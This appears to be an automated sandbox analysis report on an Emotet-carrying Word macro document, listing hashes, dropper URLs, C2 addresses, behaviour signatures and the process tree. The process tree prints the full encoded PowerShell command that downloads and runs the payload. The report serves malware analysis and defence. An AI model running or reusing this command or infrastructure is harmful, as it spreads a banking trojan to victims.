Overview

overview

10

Static

static

8

emotet_doc

windows7_x64

10

Analysis

  • max time kernel
    35s
  • max time network
    25s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    18-07-2020 00:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    91c02fe37317be17fd879fd63a10cd9da611ae6098948f77ccdcdc94f83b5cca.doc

  • Size

    195KB

  • MD5

    a9a2c192c545122bc6880c28d4ed64a5

  • SHA1

    65e912e9da2ba9b26b3b993fbda0f009c4f561a9

  • SHA256

    91c02fe37317be17fd879fd63a10cd9da611ae6098948f77ccdcdc94f83b5cca

  • SHA512

    ac0ad260f96bec4df9d283b852e94456dc2c53c7b6b87134f7cdc3480d9f68df41d7649b064a57a62c24d8fe9127b72e5c4c229905d645e7c2b7f6a55cc4e602

Score
10/10
discoverytrojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://aliyousefpoor.com/wp-admin/Gkt8B41139/
exe.dropper

http://www.szhealthshield.com/websiteguide/k82i/
exe.dropper

https://digitalcon7.net/wp-snapshots/0Wn/
exe.dropper

https://exam.ylsbmeirong.com/data/tjEyH973/
exe.dropper

http://abatiy.com/yaa/po0395/

Extracted

Family

emotet

C2

177.144.135.2:80

104.247.221.104:443

201.213.32.59:80

190.147.137.153:443

178.79.163.131:8080

190.17.195.202:80

212.71.237.140:8080

68.183.190.199:8080

12.162.84.2:8080

186.250.52.226:8080

181.129.96.162:8080

185.94.252.12:80

77.55.211.77:8080

177.72.13.80:80

70.32.115.157:8080

114.109.179.60:80

68.183.170.114:8080

5.196.35.138:7080

87.106.46.107:8080

190.163.1.31:8080
rsa_pubkey.plain

Signatures

  • Modifies registry class 280 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Blacklisted process makes network request 3 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\91c02fe37317be17fd879fd63a10cd9da611ae6098948f77ccdcdc94f83b5cca.doc"
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    PID:240
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABoAGEAdQBoAHEAdQBhAGMAdgBvAGUAbQBuAGkAbwB2AGsAbwB1AHoAPQAnAGQAYQB3AHEAdQBpAG8AYgBkAGEAdQBjAGgAdgBpAGUAYgBxAHUAZQBhAGQAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBlAEMAVQBSAEkAdABZAGAAUABSAGAATwBgAFQATwBDAG8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAHcAaQBlAHAAeABlAGkAYwB3AGUAYQBnAGMAbwBvAGcAYgBpAGEAbABqAG8AcQB1ACAAPQAgACcAOQAzADMAJwA7ACQAdABlAGEAZwBzAGUAaQB2AG4AaQBvAHgAagBhAG8AcQB1AD0AJwBsAGUAbwBrAGcAbwB1AGoAagBlAGUAYgBiAGEAZQBoACcAOwAkAHAAdQB1AHIAdABoAGUAcwB5AGUAYQB5AHMAaQBuAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB3AGkAZQBwAHgAZQBpAGMAdwBlAGEAZwBjAG8AbwBnAGIAaQBhAGwAagBvAHEAdQArACcALgBlAHgAZQAnADsAJABjAGEAdQBtAHQAbwBlAHEAdQBrAGEAYwBjAGgAaQBvAGgAZwBlAGUAcwBiAHUAbAA9ACcAZgBvAGkAcgBmAGEAbwB6AGMAbwB6AGgAaQBhAGwAcQB1AGEAdQBzACcAOwAkAHQAaABhAGkAdABrAGEAZQByAHoAdQB1AGYAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgAnACsAJwBqACcAKwAnAGUAYwB0ACcAKQAgAG4ARQBUAC4AdwBlAEIAQwBMAEkARQBOAFQAOwAkAHMAZQBhAG0AcQB1AG8AdQB3AGMAaABlAHUAYwBoAHgAYQB1AGcAegBlAGkAagA9ACcAaAB0AHQAcABzADoALwAvAGEAbABpAHkAbwB1AHMAZQBmAHAAbwBvAHIALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAEcAawB0ADgAQgA0ADEAMQAzADkALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBzAHoAaABlAGEAbAB0AGgAcwBoAGkAZQBsAGQALgBjAG8AbQAvAHcAZQBiAHMAaQB0AGUAZwB1AGkAZABlAC8AawA4ADIAaQAvACoAaAB0AHQAcABzADoALwAvAGQAaQBnAGkAdABhAGwAYwBvAG4ANwAuAG4AZQB0AC8AdwBwAC0AcwBuAGEAcABzAGgAbwB0AHMALwAwAFcAbgAvACoAaAB0AHQAcABzADoALwAvAGUAeABhAG0ALgB5AGwAcwBiAG0AZQBpAHIAbwBuAGcALgBjAG8AbQAvAGQAYQB0AGEALwB0AGoARQB5AEgAOQA3ADMALwAqAGgAdAB0AHAAOgAvAC8AYQBiAGEAdABpAHkALgBjAG8AbQAvAHkAYQBhAC8AcABvADAAMwA5ADUALwAnAC4AIgBTAGAAcABsAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAGQAYQBvAGYAcgBhAG8AdABwAGEAbwB0AHYAdQBhAHcAPQAnAHcAZQBhAHoAdABlAHUAZABjAGUAaQBnAGMAbwBlAHcAdABoAGUAaQB4AG0AZQB1AHcAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGwAbwBpAG0AeABlAG8AbgBtAG8AYQB3ACAAaQBuACAAJABzAGUAYQBtAHEAdQBvAHUAdwBjAGgAZQB1AGMAaAB4AGEAdQBnAHoAZQBpAGoAKQB7AHQAcgB5AHsAJAB0AGgAYQBpAHQAawBhAGUAcgB6AHUAdQBmAC4AIgBEAGAATwB3AG4ATABgAG8AYQBkAGYASQBMAEUAIgAoACQAbABvAGkAbQB4AGUAbwBuAG0AbwBhAHcALAAgACQAcAB1AHUAcgB0AGgAZQBzAHkAZQBhAHkAcwBpAG4AKQA7ACQAcwBvAGkAbgB3AGEAegBtAGUAaQBrAGgAZQBvAHYAdABoAGEAdQBqAGYAbwBpAHgAPQAnAG0AYQBlAHIAZABvAHUAZwBsAG8AaQBtAGcAbwBhAHQAaABjAHUAdQBjACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAcAB1AHUAcgB0AGgAZQBzAHkAZQBhAHkAcwBpAG4AKQAuACIATABgAEUAbgBnAGAAVABIACIAIAAtAGcAZQAgADMANwA2ADMAOQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBgAFIAZQBhAHQARQAiACgAJABwAHUAdQByAHQAaABlAHMAeQBlAGEAeQBzAGkAbgApADsAJABiAGEAZQB3AD0AJwB5AG8AdAB3AGEAaQB2AG0AbwBvAGsAcwBhAG8AYwBoAHQAbwBpAGoAJwA7AGIAcgBlAGEAawA7ACQAYwBpAG8AcwBwAGkAbwBiAHEAdQBhAG8AcwBsAGUAaQB3AD0AJwBqAGEAZQBjAGgAZgB1AHUAYwBoAGoAaQBlAHkAegBhAGUAeQBwAGUAbwB6AHQAaABvAGkAaAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AGUAZQBjAGwAaQBlAGcAPQAnAHgAdQBqACcA
    1⤵
    • Blacklisted process makes network request
    • Drops file in System32 directory
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:1216
  • C:\Users\Admin\933.exe
    C:\Users\Admin\933.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    • Drops file in System32 directory
    PID:1256
    • C:\Windows\SysWOW64\MigAutoPlay\SensorsApi.exe
      "C:\Windows\SysWOW64\MigAutoPlay\SensorsApi.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:1440

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/240-2-0x0000000008920000-0x0000000008924000-memory.dmp

    Filesize

    16KB

    Download

  • memory/240-5-0x000000000B0A0000-0x000000000B0A4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/240-6-0x000000000C120000-0x000000000C124000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1256-10-0x0000000000350000-0x000000000035C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/1440-13-0x0000000000260000-0x000000000026C000-memory.dmp

    Filesize

    48KB

    Download